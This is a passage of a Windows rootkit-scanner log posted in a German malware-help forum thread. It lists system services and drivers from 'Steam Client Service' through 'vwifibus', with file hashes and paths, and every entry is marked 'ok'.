21:27:10.0479 0x0ce4 Steam Client Service - ok
21:27:10.0483 0x0ce4 [ D40C589F80EB1C511263D0547C0259AE, A0236F6BB515AE006CC4C9F40FCCE250407888757A3646BB4BCB59EF8EEF1311 ] stexstor C:\WINDOWS\system32\drivers\stexstor.sys
21:27:10.0489 0x0ce4 stexstor - ok
21:27:10.0500 0x0ce4 [ F83F43CD328E6CEEAAC27612F3EB1FF5, E3D35E5154CD228301806706E6EADCA36E9113EAF44BC06E3C43B2E902187326 ] stisvc C:\WINDOWS\System32\wiaservc.dll
21:27:10.0522 0x0ce4 stisvc - ok
21:27:10.0527 0x0ce4 [ 63F1C499672A1049F0814F243798F35F, 65B39E2AFC48E8F5754296DC72183EE505677D7FCD8909D4975629D6AA849DC0 ] storahci C:\WINDOWS\system32\drivers\storahci.sys
21:27:10.0535 0x0ce4 storahci - ok
21:27:10.0538 0x0ce4 [ E5F703788DFA05411F1469E96838F438, A7E8D2DC23E23EA52B068C71D9387E69FF49798A27CE0243A994A2B1B09FA042 ] storflt C:\WINDOWS\system32\drivers\vmstorfl.sys
21:27:10.0544 0x0ce4 storflt - ok
21:27:10.0547 0x0ce4 [ 0D0128244FF55EAD3F878D3FE542DBA5, 4FCFA1B2113E07264A71A22298CA6E9FDC2AB722E0AE184A8F5656C18113A858 ] stornvme C:\WINDOWS\system32\drivers\stornvme.sys
21:27:10.0554 0x0ce4 stornvme - ok
21:27:10.0558 0x0ce4 [ 3A62FF78619258E6126C5C4B4CC82C8E, C72CC295680B35E0EEE5A5310E0241E2FFE0E540BFAA49C35C06AA882229C1CD ] storqosflt C:\WINDOWS\system32\drivers\storqosflt.sys
21:27:10.0565 0x0ce4 storqosflt - ok
21:27:10.0578 0x0ce4 [ 212CB512B785E218667CCA56C4BFD71D, 5FD4CFEE5AB2187D928632076E6AD5C2C53D66884479C4D34930DCFCA3CCEE34 ] StorSvc C:\WINDOWS\system32\storsvc.dll
21:27:10.0600 0x0ce4 StorSvc - ok
21:27:10.0604 0x0ce4 [ C6097966F8EA3B288070CDF7C3C8C3E8, D12C4AF3E54DCE1E5DC9C8AA0E83420F481DC0165A7F7845083A85BABC102D37 ] storufs C:\WINDOWS\system32\drivers\storufs.sys
21:27:10.0609 0x0ce4 storufs - ok
21:27:10.0612 0x0ce4 [ 3DC3B17E92DA02E36B4138733DF6C1AC, 398F20B6D6DAF6DA950C149F63F3B23864E1478119BFE53218C220CEADEC800D ] storvsc C:\WINDOWS\system32\drivers\storvsc.sys
21:27:10.0618 0x0ce4 storvsc - ok
21:27:10.0621 0x0ce4 [ D284AB2CA6C30317D142D38CE1F848BE, 4C9EAE174F5C673CA550C9382E85CE7DAF5DC9965495BAB09078B634A4CDD4FB ] svsvc C:\WINDOWS\system32\svsvc.dll
21:27:10.0631 0x0ce4 svsvc - ok
21:27:10.0634 0x0ce4 [ 2BC4D0EBC2467FE90302AE0AFAF23768, CF8BCC9CA1FBA8407FD044613A2497BEEC641DE463B076F0ED1FA7674C202ADE ] swenum C:\WINDOWS\System32\drivers\swenum.sys
21:27:10.0640 0x0ce4 swenum - ok
21:27:10.0648 0x0ce4 [ 13985DA558FBCBFD9108A2CACB5FE494, DD457A73E82147AA90C36D695A47E862FF90D96FB1E22760FAB5780F7C332A46 ] swprv C:\WINDOWS\System32\swprv.dll
21:27:10.0667 0x0ce4 swprv - ok
21:27:10.0671 0x0ce4 [ 572F81CF08972D53BAFFC2A110A2A586, D9AF8EBB31CE097849F93FC8C0F06178B2E1CA8C48D08BBDD85174CCD64A16D6 ] Synth3dVsc C:\WINDOWS\System32\drivers\Synth3dVsc.sys
21:27:10.0679 0x0ce4 Synth3dVsc - ok
21:27:10.0694 0x0ce4 [ 4746E7782AABDDC950E94336C03D3D4E, B583CB003D364F82B6C45932CC119FF8D5555E3E0B2D75B861B34C1B6AB6509B ] SysMain C:\WINDOWS\system32\sysmain.dll
21:27:10.0727 0x0ce4 SysMain - ok
21:27:10.0734 0x0ce4 [ 97E0FD613D031EAA73E8AD259169AC22, E86E9B9C18AF2E79D7CF80B177A12D89418CDBD3CBB74307809DD0377408DB82 ] SystemEventsBroker C:\WINDOWS\System32\SystemEventsBrokerServer.dll
21:27:10.0748 0x0ce4 SystemEventsBroker - ok
21:27:10.0753 0x0ce4 [ 7750219DFABC38261575B6CEFBF84EC6, 50DF85E34AF7C1343281AD0EF34FD94AB0E279DA5C61976ABA0135B8F013C543 ] TabletInputService C:\WINDOWS\System32\TabSvc.dll
21:27:10.0763 0x0ce4 TabletInputService - ok
21:27:10.0770 0x0ce4 [ C1C6A802C2A9A57029D4347E251F4D18, 9F75B7F003C829FFDB2CDC98231D32FE988754D23873048FA4F6EB82ED1DCED4 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
21:27:10.0784 0x0ce4 TapiSrv - ok
21:27:10.0821 0x0ce4 [ 0907BD52E5264C0851A839D471F35DA0, 6301E98E343F72AD8F10C3AAED3EFD60221EC43206BD6740DD0CD8DF3ECBB5F5 ] Tcpip C:\WINDOWS\system32\drivers\tcpip.sys
21:27:10.0867 0x0ce4 Tcpip - ok
21:27:10.0907 0x0ce4 [ 0907BD52E5264C0851A839D471F35DA0, 6301E98E343F72AD8F10C3AAED3EFD60221EC43206BD6740DD0CD8DF3ECBB5F5 ] Tcpip6 C:\WINDOWS\system32\drivers\tcpip.sys
21:27:10.0954 0x0ce4 Tcpip6 - ok
21:27:10.0961 0x0ce4 [ 1C35A5C62D110346379C55E39A3D547C, 5BDBD593AB51ECA5A6B703E86F300E3B2B153E128BEB9A006ABD827AE726BD62 ] tcpipreg C:\WINDOWS\system32\drivers\tcpipreg.sys
21:27:10.0970 0x0ce4 tcpipreg - ok
21:27:10.0975 0x0ce4 [ 2540384EF2EEE5BE930E3FB1061395DC, 53BACC0718967E0860BAE1EB2DECDD3960FA19AC47066C5DFCE03AA0427BB654 ] tdx C:\WINDOWS\system32\DRIVERS\tdx.sys
21:27:10.0982 0x0ce4 tdx - ok
21:27:10.0985 0x0ce4 [ 96A35CDBA661D41C5A3914257CA1D200, 691ABBAA99C673E7D0B81D811BCC60976C3EC050F2B39B35B87A3BCC211F119A ] terminpt C:\WINDOWS\System32\drivers\terminpt.sys
21:27:10.0991 0x0ce4 terminpt - ok
21:27:11.0007 0x0ce4 [ 0B5C6D1683CDE89B3488326C60EA6EF2, 3B822CF005FA3002F27FF9BF39E7E133987230DA3481CFCF99F3B2B6B373A718 ] TermService C:\WINDOWS\System32\termsrv.dll
21:27:11.0036 0x0ce4 TermService - ok
21:27:11.0040 0x0ce4 [ 6568EF1B30101979107055B7E515EE58, A318082E5FDD79C9F85E8C00A78EBFA0EC44B1046976E85633DC7BD123DA38B9 ] Themes C:\WINDOWS\system32\themeservice.dll
21:27:11.0052 0x0ce4 Themes - ok
21:27:11.0059 0x0ce4 [ 2ABC11CFC2F03A919AF78A6E3E29C570, 54D91F89993A0FF090E2213EED92DE3659DCB693FBDA5932E31C6D6D7CFC8E80 ] TieringEngineService C:\WINDOWS\system32\TieringEngineService.exe
21:27:11.0075 0x0ce4 TieringEngineService - ok
21:27:11.0086 0x0ce4 [ 8949EED671F531E7B4A0FD7333CCC125, 2D55A1B4FD6843A11383BB71D0409943CA0C47350153F3EDAAA3CADFA4A3504A ] tiledatamodelsvc C:\WINDOWS\system32\tileobjserver.dll
21:27:11.0107 0x0ce4 tiledatamodelsvc - ok
21:27:11.0112 0x0ce4 [ E59D4F92FE11B47AB727C6D192CC977F, 1DA06663889A20A1B22DDF90E5C99A5668023C0B89E252F3E820C0D1964B1948 ] TimeBrokerSvc C:\WINDOWS\System32\TimeBrokerServer.dll
21:27:11.0123 0x0ce4 TimeBrokerSvc - ok
21:27:11.0139 0x0ce4 [ C83505A5CC15E39D6C6D7B3C20187E5C, A6AB47C041A7C99CB0D5EA706CC31B3D88DC83BAF5AF7E59F651F9D7068D94B2 ] TokenBroker C:\WINDOWS\System32\TokenBroker.dll
21:27:11.0168 0x0ce4 TokenBroker - ok
21:27:11.0174 0x0ce4 [ 13878331EB3906C29A1F4E46B9606218, 892C17BBB35E72B36AE5F16124DFD5D8D7151260A370C142EBDD1D14EAD42AB9 ] TPM C:\WINDOWS\System32\drivers\tpm.sys
21:27:11.0183 0x0ce4 TPM - ok
21:27:11.0187 0x0ce4 [ 85E0D4431D61675A94EA99C9E1F56436, 9FA750703E04D20A62DBB0185CBDD70AFC4573FB65F86E61AAF7CF7A7D8E1E3E ] TrkWks C:\WINDOWS\System32\trkwks.dll
21:27:11.0197 0x0ce4 TrkWks - ok
21:27:11.0206 0x0ce4 [ AA129EFF64E41947F6A46388A7F5F966, CB3699055EA62F1BE132CDBA1F728C86B48625E4F63A2FD78C686D52A4265906 ] trufos C:\WINDOWS\system32\DRIVERS\trufos.sys
|
|
21.05.2017, 20:30
| #10 |
| | Trojaner, Adware oder sonstiges ?Code:
ATTFilter 21:27:11.0218 0x0ce4 trufos - ok
21:27:11.0222 0x0ce4 [ F21A69013A67B372675F523262AC1E33, C3F910E375C0F4B7FFA6F6D755622FF6B0CAE36DF691C938DE177C94815FE3C8 ] TrustedInstaller C:\WINDOWS\servicing\TrustedInstaller.exe
21:27:11.0231 0x0ce4 TrustedInstaller - ok
21:27:11.0236 0x0ce4 [ 9856BCCD1CD5DE4D17E8DBBA7CEFC688, F4B532DCE6F4728092848FE7B2FC05AB921EC7B3FDD7E62AB40EE0029C008398 ] TsUsbFlt C:\WINDOWS\system32\drivers\tsusbflt.sys
21:27:11.0244 0x0ce4 TsUsbFlt - ok
21:27:11.0246 0x0ce4 [ 837AD2B941E721BCCEB7EF137E2DEE18, 84BE22616A50467B1957434C8BD19C8B0FC3B21CD77FFB8E16A09347CEAE0F4E ] TsUsbGD C:\WINDOWS\System32\drivers\TsUsbGD.sys
21:27:11.0253 0x0ce4 TsUsbGD - ok
21:27:11.0257 0x0ce4 [ 5DED9E34D133F4A363652CDB595D83F3, E8CFE5DF737D7C2A576B2D6D508977E1F6961122D541DF82AA581C7B3B1C384B ] tsusbhub C:\WINDOWS\system32\drivers\tsusbhub.sys
21:27:11.0266 0x0ce4 tsusbhub - ok
21:27:11.0271 0x0ce4 [ B3142C6118703E98EB0510CF7B43D0F2, 40FDCBAA2AD93026AD479BF8C1B4EE7A4E2E65590608B6B1C5DEB3C4716E5C03 ] tunnel C:\WINDOWS\System32\drivers\tunnel.sys
21:27:11.0287 0x0ce4 tunnel - ok
21:27:11.0291 0x0ce4 [ B097B77121A057AB6D70C647636978D4, 10F78A18AC898CDD0FA91D6FA29B8B45C6D8F6CE65B064C39256EB20FC6CD085 ] tzautoupdate C:\WINDOWS\system32\tzautoupdate.dll
21:27:11.0301 0x0ce4 tzautoupdate - ok
21:27:11.0305 0x0ce4 [ B4C846ABD462558D45CA578C855759C3, E0F0DD39A6C101C2209CA46EF2B5A5F4559843C9EE37CC08ED78D9E124A566D2 ] UASPStor C:\WINDOWS\System32\drivers\uaspstor.sys
21:27:11.0311 0x0ce4 UASPStor - ok
21:27:11.0315 0x0ce4 [ 5C2C0296D9EE7DC92A3F14642FBE656D, 94A7D549EC53C71095AD8DE4DB8F846D1DB3438FE2679E41DCAE62C34C0654DD ] UcmCx0101 C:\WINDOWS\system32\Drivers\UcmCx.sys
21:27:11.0323 0x0ce4 UcmCx0101 - ok
21:27:11.0328 0x0ce4 [ 8BB64E04CD97AD8C68543181D93E2AFC, FBA2FB9A9906721BAD42CDFFCCE0234AF3F72B83E2571E526801F19173B7C9CE ] UcmTcpciCx0101 C:\WINDOWS\system32\Drivers\UcmTcpciCx.sys
21:27:11.0338 0x0ce4 UcmTcpciCx0101 - ok
21:27:11.0341 0x0ce4 [ 5A7CE114C8DA9060F32633F81A5625E5, B49163951B380827ADBF13D336D5BDC1EEE90A70058019928A603AA1C24D8EB7 ] UcmUcsi C:\WINDOWS\System32\drivers\UcmUcsi.sys
21:27:11.0348 0x0ce4 UcmUcsi - ok
21:27:11.0353 0x0ce4 [ 5D4EAF3D0911338CB8FDB088386D6DCA, 1AC5B494C39570E66C4D4F867C6B8E37C174FB5D67C2865B07247122F60F8895 ] Ucx01000 C:\WINDOWS\system32\drivers\ucx01000.sys
21:27:11.0362 0x0ce4 Ucx01000 - ok
21:27:11.0364 0x0ce4 [ 384E1F0D84B465820416338E52FE7C2B, 8F82778332EA1199987BA569536CBED8FEAF5E9D920321B0C9DFCBDDD91EEA35 ] UdeCx C:\WINDOWS\system32\drivers\udecx.sys
21:27:11.0372 0x0ce4 UdeCx - ok
21:27:11.0379 0x0ce4 [ C82BE75239D412057C9E3DB1785680C6, AE712E40440F5725DA41C95C3E558B5E9ABB17C55B70297DD40D7D1BDA7CE45D ] udfs C:\WINDOWS\system32\DRIVERS\udfs.sys
21:27:11.0397 0x0ce4 udfs - ok
21:27:11.0400 0x0ce4 [ CCDF6EFF952BF3BF34DC17600F479397, 2A2009B3C4BD1A44F1C6E334CB0A7DD02443BCE1EB48837C1C70A2A04CC7C54A ] UEFI C:\WINDOWS\System32\drivers\UEFI.sys
21:27:11.0406 0x0ce4 UEFI - ok
21:27:11.0409 0x0ce4 [ 244A80A1A881E2B9303A0364AAB33F16, 3C58D5D5B1AF6AB598E6450817381E7D6B8700151B66DCDAD6002E73BD0EDF27 ] UevAgentDriver C:\WINDOWS\system32\drivers\UevAgentDriver.sys
21:27:11.0414 0x0ce4 UevAgentDriver - ok
21:27:11.0432 0x0ce4 [ 5F1DA3635C2F6B74EBFDEBFC747B63B5, 1B456B777C5099A67E405FEF20B5CBCB24C6FCE9ED7A5A421C6574618364FD47 ] UevAgentService C:\WINDOWS\system32\AgentService.exe
21:27:11.0463 0x0ce4 UevAgentService - ok
21:27:11.0470 0x0ce4 [ 00BEF71C45FD6B06E7525E7B31EFA88C, C0BDE8CB41BF9A34E395EA86756637E4CD6B88EF1C842364ECA639948D6CD59A ] Ufx01000 C:\WINDOWS\system32\drivers\ufx01000.sys
21:27:11.0479 0x0ce4 Ufx01000 - ok
21:27:11.0482 0x0ce4 [ 9450AB15C30CF7D1F23C8A42E778C3A2, E62455008ED5B7220AEE62E0F459A67E26FB2878349ABA5AAF0164C2E7A8C0E9 ] UfxChipidea C:\WINDOWS\System32\drivers\UfxChipidea.sys
21:27:11.0489 0x0ce4 UfxChipidea - ok
21:27:11.0493 0x0ce4 [ CEE12C7A689BDF448715024A7E0EB9C3, EC48E1469800E34A71C8A97A6F2F0B7C67385BCB8438844E6967DE0A82E39B94 ] ufxsynopsys C:\WINDOWS\System32\drivers\ufxsynopsys.sys
21:27:11.0501 0x0ce4 ufxsynopsys - ok
21:27:11.0506 0x0ce4 [ 5A2F610B31CC3FD23D3E20C1D5F1EF52, D470B7C1CAE066C2DCDBA47001913FB1A7C9CC5B200FB8324DB896B641C1A132 ] UI0Detect C:\WINDOWS\system32\UI0Detect.exe
21:27:11.0516 0x0ce4 UI0Detect - ok
21:27:11.0519 0x0ce4 [ F39ED750EDF5948FA8CD99D1F4EC9372, AE42AE50DE09F26D3CA4ACDCD5ECABD59D26926707030F0532A885266FE83EF9 ] umbus C:\WINDOWS\System32\drivers\umbus.sys
21:27:11.0527 0x0ce4 umbus - ok
21:27:11.0529 0x0ce4 [ 55984D4E64C2F8E4223542CBCC15EDEB, ECBC832FBBA6AFCAEDEBB2728FA4A6DDCF52A6421929E72CA29B61CDBED840DF ] UmPass C:\WINDOWS\System32\drivers\umpass.sys
21:27:11.0536 0x0ce4 UmPass - ok
21:27:11.0542 0x0ce4 [ FBEF4641E3E08A03CA84AF5C393CA86B, 9A14A0FB645AB6DD0B49F3A14FBF38FECC65796F2503324E93994113CC7AD52F ] UmRdpService C:\WINDOWS\System32\umrdp.dll
21:27:11.0555 0x0ce4 UmRdpService - ok
21:27:11.0573 0x0ce4 [ 3699DED879B2FF8FC1ECE91489109796, 05B1283256F6CA6AF3ABBE003360BF0BAB3400223092E7E9F0822120BF576BD2 ] UnistoreSvc C:\WINDOWS\System32\unistore.dll
21:27:11.0605 0x0ce4 UnistoreSvc - ok
21:27:11.0616 0x0ce4 [ C01212FAF3D89703E52CC17BC74261D4, 5621C4813A6251AEC0A0C6C56338C2F47B531CE59CD22F43B2474D9513D4B94B ] UPDATESRV C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
21:27:11.0624 0x0ce4 UPDATESRV - ok
21:27:11.0633 0x0ce4 [ BBB6BDBE5ADCE6F87F70623D5A1EC5BC, E8BD5804FF82417890A9D1A44096B174E81A8C7AD3059B1F0C62740E0B39D137 ] upnphost C:\WINDOWS\System32\upnphost.dll
21:27:11.0656 0x0ce4 upnphost - ok
21:27:11.0660 0x0ce4 [ 4D23214CB8B1C36B82061280EB8FDAB3, 387C01A7F9D8F89ED894EDF894AAAF8830DD7C90DF2F12A2CB4C4E9C7CB773BE ] UrsChipidea C:\WINDOWS\System32\drivers\urschipidea.sys
21:27:11.0665 0x0ce4 UrsChipidea - ok
21:27:11.0669 0x0ce4 [ 4329D880DB96B504F0DDC991A7374CCD, 1486BEF2C03ED281B24A17D3C18FEA2360E37A6B46D1A67D4690CD871B0A13DA ] UrsCx01000 C:\WINDOWS\system32\drivers\urscx01000.sys
21:27:11.0675 0x0ce4 UrsCx01000 - ok
21:27:11.0678 0x0ce4 [ 93FAD0AC5879F274FA248A49E3F3EA33, D936F408E23040B33F30AB3B43D8B8BB9F3CCF2549E821F4C47357987AFF386F ] UrsSynopsys C:\WINDOWS\System32\drivers\urssynopsys.sys
21:27:11.0683 0x0ce4 UrsSynopsys - ok
21:27:11.0688 0x0ce4 [ 6B09AA6A04C8261E787B6523229E7159, F97BED424E988AC6272D51025FD0D3180E89BAF0FFC83DAB609774D6269B353A ] usbccgp C:\WINDOWS\System32\drivers\usbccgp.sys
21:27:11.0696 0x0ce4 usbccgp - ok
21:27:11.0700 0x0ce4 [ ECE3AD18B4C22ED0C4AB1A2AD9AC32C8, 2062D400305075E886CF2C9D710A1C48B3F4AD48E7A75A77C66547357E96CB6E ] usbcir C:\WINDOWS\System32\drivers\usbcir.sys
21:27:11.0709 0x0ce4 usbcir - ok
21:27:11.0713 0x0ce4 [ F8BCB536866474C6D8008F4C69B778A1, F86F4330DE2F50D48559C1ED46168ADB8F6AA7C8FE3834FFE00085C1783C5750 ] usbehci C:\WINDOWS\System32\drivers\usbehci.sys
21:27:11.0719 0x0ce4 usbehci - ok
21:27:11.0729 0x0ce4 [ 1F723DA014062DBF3288B408A7611845, 0CCC9360259E6FBC510BBF69AE991A53A92516023AAC32C60A44BD3B43371C66 ] usbhub C:\WINDOWS\System32\drivers\usbhub.sys
21:27:11.0742 0x0ce4 usbhub - ok
21:27:11.0752 0x0ce4 [ C3F953D10C486D6A190AF548B3CF7DC9, B0FB45B3045D499A44853A9D4CFD39C9D92873FC0A62A3D76B6149E601DFECD8 ] USBHUB3 C:\WINDOWS\System32\drivers\UsbHub3.sys
21:27:11.0766 0x0ce4 USBHUB3 - ok
21:27:11.0770 0x0ce4 [ BE6ED98FD0D3FE5FB11762AD7CCD6C96, 54C6C929CA55EA6770474F7E230190FC7574C1FA52437B564B3B5FA4D6106D8A ] usbohci C:\WINDOWS\System32\drivers\usbohci.sys
21:27:11.0776 0x0ce4 usbohci - ok
21:27:11.0779 0x0ce4 [ CEE43CD5357DB8786CE6E2C430841AE4, 50F4629AE488A12D18EFFAD486D2F95545049AB1F6A3248BA44D2132EEC9A653 ] usbprint C:\WINDOWS\System32\drivers\usbprint.sys
21:27:11.0786 0x0ce4 usbprint - ok
21:27:11.0790 0x0ce4 [ 99F0738B320B7A8D11351A32F68AA5F1, DAA887C31E3F56245C15F04044C12B6E832FA7E837F4107376A6F8D8E3A99FEC ] usbser C:\WINDOWS\System32\drivers\usbser.sys
21:27:11.0797 0x0ce4 usbser - ok
21:27:11.0802 0x0ce4 [ 67E26F56CF7EACCBD9C9F75343A3D7C2, 210FA280897CCCB2458E9E683A8B4CA8A5DF9606B54F8B9CE05CA4AA6FD810AB ] USBSTOR C:\WINDOWS\System32\drivers\USBSTOR.SYS
21:27:11.0809 0x0ce4 USBSTOR - ok
21:27:11.0812 0x0ce4 [ 7BA802C9F73A84B75BB22538ADA495BE, 7D97E6305168C4CA86AB9BD5B63300156DFE97032251CB83DB1D4C4DB9C28DC8 ] usbuhci C:\WINDOWS\System32\drivers\usbuhci.sys
21:27:11.0819 0x0ce4 usbuhci - ok
21:27:11.0827 0x0ce4 [ 50E70B3A95138AA4A30B095270EE0DE6, 9B7072C36230102A089C4A6DFE1980CD9DB28E566EF02830600DEBAF3AAD31C7 ] USBXHCI C:\WINDOWS\System32\drivers\USBXHCI.SYS
21:27:11.0838 0x0ce4 USBXHCI - ok
21:27:11.0861 0x0ce4 [ 3156FFFB2B3BF5375814F777D343AD9F, C4E63043EB9D9227CDD487608AF9BA25C755D85E5FF8E63C2079D68CCC79E4BB ] UserDataSvc C:\WINDOWS\System32\userdataservice.dll
21:27:11.0902 0x0ce4 UserDataSvc - ok
21:27:11.0919 0x0ce4 [ C0E60CC6D48013728C7E4168D61A0B39, CA283312E9669BCC74A3B5E6332502D1CAA7148C049B94AF3996F3C7CD2676EF ] UserManager C:\WINDOWS\System32\usermgr.dll
21:27:11.0949 0x0ce4 UserManager - ok
21:27:11.0961 0x0ce4 [ C71F447901864A61698B9FA2CF538146, 13673F28E6AE2CE8AB20ECF93997B49A355087F72970FE0BA7319B629DB3D36E ] UsoSvc C:\WINDOWS\system32\usocore.dll
21:27:11.0983 0x0ce4 UsoSvc - ok
21:27:11.0987 0x0ce4 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] VaultSvc C:\WINDOWS\system32\lsass.exe
21:27:11.0994 0x0ce4 VaultSvc - ok
21:27:11.0997 0x0ce4 [ C1EC9211C7759D2487FD30934AA3EE96, 6914BB8B44550DFE75E5A3772E93ADF8459EB621CA400BDD9B7E3185A09B6F9A ] vdrvroot C:\WINDOWS\system32\drivers\vdrvroot.sys
21:27:12.0003 0x0ce4 vdrvroot - ok
21:27:12.0014 0x0ce4 [ 374CD93271184F04988FDC1C25B3E855, 09727093C5F7B258867C16D41F7F9835BF549CC339288BFE01A8F34AC7E93E23 ] vds C:\WINDOWS\System32\vds.exe
21:27:12.0038 0x0ce4 vds - ok
21:27:12.0044 0x0ce4 [ C83F3BC00651448DB127D497CF955089, 31B8838CEED08E7D5DD8635A805A8010798BD9B10A3775FAFDB576FBD7303D39 ] VerifierExt C:\WINDOWS\system32\drivers\VerifierExt.sys
21:27:12.0052 0x0ce4 VerifierExt - ok
21:27:12.0064 0x0ce4 [ 1021DCD0E3632E099E599B8893DC7969, 18A4F022240FBBDAEEAF6613E88F1B89370EE8BE575059657FEA451D7DA1FE75 ] vhdmp C:\WINDOWS\System32\drivers\vhdmp.sys
21:27:12.0081 0x0ce4 vhdmp - ok
21:27:12.0085 0x0ce4 [ 1AD096A5C00E522398D0092D875A8CB6, 6959FCD6DD2115CD293DBD4BCD6D1BA0AE4F7495A9BBB48F7388384EEABB38E9 ] vhf C:\WINDOWS\System32\drivers\vhf.sys
21:27:12.0092 0x0ce4 vhf - ok
21:27:12.0096 0x0ce4 [ EE9A22CFD9AEDD7B52F98B0272494609, F668131BABD048857F011A471936B52EDF0F2A42CB6000ACB4E0E43F88782AAD ] vmbus C:\WINDOWS\system32\drivers\vmbus.sys
21:27:12.0103 0x0ce4 vmbus - ok
21:27:12.0106 0x0ce4 [ BFBD0895926FD98A03AD6BB845B569B7, 5B7913ACD6CC132B2F36B079BC5F897C21884A7F21046B8996CC3D74C4B6DA4C ] VMBusHID C:\WINDOWS\System32\drivers\VMBusHID.sys
21:27:12.0112 0x0ce4 VMBusHID - ok
21:27:12.0115 0x0ce4 [ C123C97D351C56C75FE5335AB18255EE, 67315E332E863E5C233BA113826A5DEEE08C1A0A3358E6AC21F25DC5EAC86D07 ] vmgid C:\WINDOWS\System32\drivers\vmgid.sys
21:27:12.0122 0x0ce4 vmgid - ok
21:27:12.0128 0x0ce4 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicguestinterface C:\WINDOWS\System32\icsvc.dll
21:27:12.0141 0x0ce4 vmicguestinterface - ok
21:27:12.0146 0x0ce4 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicheartbeat C:\WINDOWS\System32\icsvc.dll
21:27:12.0159 0x0ce4 vmicheartbeat - ok
21:27:12.0164 0x0ce4 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmickvpexchange C:\WINDOWS\System32\icsvc.dll
21:27:12.0177 0x0ce4 vmickvpexchange - ok
21:27:12.0184 0x0ce4 [ F8F380ABEAFBC589FF6D2D96267C1210, 0CFA3D9E88D984BAFED8E08102BF4DC4077856C6C8C1EBD8D4C4D0D49B673F44 ] vmicrdv C:\WINDOWS\System32\icsvcext.dll
21:27:12.0197 0x0ce4 vmicrdv - ok
21:27:12.0203 0x0ce4 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicshutdown C:\WINDOWS\System32\icsvc.dll
21:27:12.0215 0x0ce4 vmicshutdown - ok
21:27:12.0221 0x0ce4 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmictimesync C:\WINDOWS\System32\icsvc.dll
21:27:12.0234 0x0ce4 vmictimesync - ok
21:27:12.0240 0x0ce4 [ A9C889CFDDE704A15CDC639C3D6662B6, 9EE41886D9E8DFDB512B821EAFE1857E83A3C3318EB852A2C110DB8184346AA9 ] vmicvmsession C:\WINDOWS\System32\icsvc.dll
21:27:12.0253 0x0ce4 vmicvmsession - ok
21:27:12.0259 0x0ce4 [ F8F380ABEAFBC589FF6D2D96267C1210, 0CFA3D9E88D984BAFED8E08102BF4DC4077856C6C8C1EBD8D4C4D0D49B673F44 ] vmicvss C:\WINDOWS\System32\icsvcext.dll
21:27:12.0272 0x0ce4 vmicvss - ok
21:27:12.0276 0x0ce4 [ 0AB9C264F13E2A070A8CF10EDD099ED2, 2E7EB4EE8DCBBCA497CC0E7F4BE057627E9702B6FAF56A7DBCA1325236C880EC ] volmgr C:\WINDOWS\system32\drivers\volmgr.sys
21:27:12.0283 0x0ce4 volmgr - ok
21:27:12.0290 0x0ce4 [ 6EE608257C1137A25B402EF8FC77E83A, 3AE684EBA32563468AD917155C93220F938460A699FBFC3DB8436F83C0C54209 ] volmgrx C:\WINDOWS\system32\drivers\volmgrx.sys
21:27:12.0301 0x0ce4 volmgrx - ok
21:27:12.0309 0x0ce4 [ E3429DBBEA3965BB96E24B16EF4A2551, 0CEE2DEF75C6761DA67AFD3BBF8DEEB1331796719EB84D658B3E517DEC824B49 ] volsnap C:\WINDOWS\system32\drivers\volsnap.sys
21:27:12.0321 0x0ce4 volsnap - ok
21:27:12.0324 0x0ce4 [ 86E790B503C771E674C7DF8FFCBFEFDB, 634B27C4FA363A2165D3D6929D3B22F41EE06198C579A70D446A48830924467B ] volume C:\WINDOWS\system32\drivers\volume.sys
21:27:12.0329 0x0ce4 volume - ok
21:27:12.0333 0x0ce4 [ B25589A0892E6DF8CC07E5CB48BFC954, DA29974426EFD4472A3828FA0EF31AD3860AA8068AB66B5F4BE6A412BC3E73E9 ] vpci C:\WINDOWS\System32\drivers\vpci.sys
21:27:12.0339 0x0ce4 vpci - ok
21:27:12.0344 0x0ce4 [ AA4466A47D2CA7ECE3DCF5256017DCC3, 83414BFBD3DF1CB7417F0F55709E8180D97FA20A74581C34EAAFF667FBEBFD93 ] vsmraid C:\WINDOWS\system32\drivers\vsmraid.sys
21:27:12.0352 0x0ce4 vsmraid - ok
21:27:12.0374 0x0ce4 [ 0BB73BF6FDDD19DE3DE9377EA95E4C64, 74B6E612F9E009A5E43B603BCAD854F3711F6C8A7ED0328B1E3A9B2D4C9EA342 ] VSS C:\WINDOWS\system32\vssvc.exe
21:27:12.0415 0x0ce4 VSS - ok
21:27:12.0437 0x0ce4 [ 3B8D01B7C1A4F714D01FAA8DEA70A20A, 25944F4B10B42C5596539FCD42290D8A40869F4700C074BBF9CC3721B9AE5E02 ] VSSERV C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
21:27:12.0462 0x0ce4 VSSERV - ok
21:27:12.0472 0x0ce4 [ 4889BF61752AD05C2AC73CF72A7C8F16, 9B2FF0CAF57855AA1F37933F2B9DC2B845D6BAD80C5DD400BD688DF343AFCDF5 ] vsservp C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
21:27:12.0484 0x0ce4 vsservp - ok
21:27:12.0492 0x0ce4 [ 98BB6C9AD39D8F2E883093F28282FAEC, 63F4036A1DB23C20AAEEC1CA8ABDE9B46FA09A55EA4E5DB0C0B5D6D58ABAD62F ] VSTXRAID C:\WINDOWS\system32\drivers\vstxraid.sys
21:27:12.0502 0x0ce4 VSTXRAID - ok
21:27:12.0505 0x0ce4 [ B47026E109828102266CBE2F5F9AD113, 28C76B34C48BACEA267A208CC758BB55539323B16300E869AE71B6A99A849AB5 ] vwifibus C:\WINDOWS\System32\drivers\vwifibus.sys
21:27:12.0519 0x0ce4 vwifibus - ok
